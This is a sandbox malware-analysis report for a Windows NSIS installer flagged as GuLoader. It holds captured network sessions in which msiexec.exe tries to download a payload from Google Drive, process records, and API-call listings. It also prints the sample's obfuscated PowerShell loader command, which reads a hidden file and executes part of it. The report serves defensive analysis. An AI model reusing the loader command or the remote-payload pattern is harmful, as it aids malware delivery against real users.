2025-01-11 02:09:30 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:30 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSwCHat4uhEJ4UeKb7te0J71D_tJglQ3l5UHA3u8sHUWQkAMA6ZKrN7SkVrvj9pUPV-bKMn5uw Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:30 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-BXAuri8N-g8MqamUDEvxiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:30 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 66 56 79 53 5f 51 4e 2d 63 76 74 55 79 36 5f 41 47 71 72 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pfVyS_QN-cvtUy6_AGqrpQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50022	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:31 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:31 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:31 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-izANSYGxC1ZLLJLNEekxkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50023	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:32 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:33 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQFFFDL6iJB0uVtmxZWg7YTE7svkqNKozszD9bYoTt0XDEejBki-lV6iUpzAzc4qpvZw7Y9NzI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:33 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-0uNW_C1Nd0rfJ8rGXqQaOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:33 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 6d 4a 6d 38 76 64 72 6d 44 68 33 52 42 59 48 54 6e 4e 36 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NmJm8vdrmDh3RBYHTnN6RA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50024	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:34 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:34 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:34 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-o29F4_8lZla8fOQCBlBMYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50025	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:35 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:35 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgScSgnFCF1bib7ImfpRNgOwgBA_lupFaR_qSHRPyDpoh6PHtxIYb7GYuZCIsTYF1oMhS7iwhI0 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:35 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-8VAymmCHxvr6rv_SM2eBQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:35 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 7a 49 42 34 37 36 31 30 70 37 37 7a 75 37 6e 71 6f 58 43 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HzIB47610p77zu7nqoXChg">*{margin:0;padding:0}html,code{font:15px/22px arial

Target ID:	0
Start time:	21:07:27
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\ro7eoySJ9q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ro7eoySJ9q.exe"
Imagebase:	0x400000
File size:	1'060'792 bytes
MD5 hash:	69C59075BC9FFD11BF75080CFE44F29E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:07:32
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"
Imagebase:	0x9c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2832325462.000000000A25B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:07:32
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:08:34
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xb40000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3416961233.0000000004BFB000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.7%
Total number of Nodes:	1267
Total number of Limit Nodes:	30

Executed Functions

Function 004031DD Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004031FC
SetErrorMode.KERNELBASE(00008001), ref: 00403207
OleInitialize.OLE32(00000000), ref: 0040320E

Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE

SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236

Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53

GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000), ref: 0040325E
CharNextW.USER32(00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000020), ref: 00403285
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
DeleteFileW.KERNELBASE(1033), ref: 004033EF
OleUninitialize.OLE32(?), ref: 0040349F
ExitProcess.KERNEL32 ref: 004034BF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000,?), ref: 004034CB
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000,?), ref: 004034D7
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich,?), ref: 00403544
CopyFileW.KERNEL32(C:\Users\user\Desktop\ro7eoySJ9q.exe,0042A9B8,00000001), ref: 00403558
CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
ExitProcess.KERNEL32 ref: 0040363A

Strings

1033, xrefs: 004033EA
C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 0040336E, 00403471, 004034F0, 004034FA
C:\Users\user\Desktop, xrefs: 004034D0, 004034D5, 004034F9
Low, xrefs: 004033BC
"$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich, xrefs: 00403508
TMP, xrefs: 004033D6
C:\Users\user\Desktop\ro7eoySJ9q.exe, xrefs: 00403553
"C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 00403251, 00403257, 00403413
Error launching installer, xrefs: 00403456
TEMP, xrefs: 004033CE
C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 0040347C
NSIS Error, xrefs: 0040323C
~nsu.tmp, xrefs: 004034C5
C:\Users\user\AppData\Local\Temp\, xrefs: 0040337E, 00403383, 00403399, 004033A5, 004033B4, 004033C1, 004033CD, 004033D5, 004034CA, 004034D6, 004034E2, 004034E9, 0040359A
\Temp, xrefs: 004033A0
SeShutdownPrivilege, xrefs: 004035ED

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich$"C:\Users\user\Desktop\ro7eoySJ9q.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\Desktop$C:\Users\user\Desktop\ro7eoySJ9q.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-3401160410
Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E

Function 00405139 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405198
GetDlgItem.USER32(?,000003EE), ref: 004051A7
GetClientRect.USER32(?,?), ref: 004051E4
GetSystemMetrics.USER32(00000015), ref: 004051EC
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
ShowWindow.USER32(?,00000008), ref: 00405288
GetDlgItem.USER32(?,000003EC), ref: 004052A9
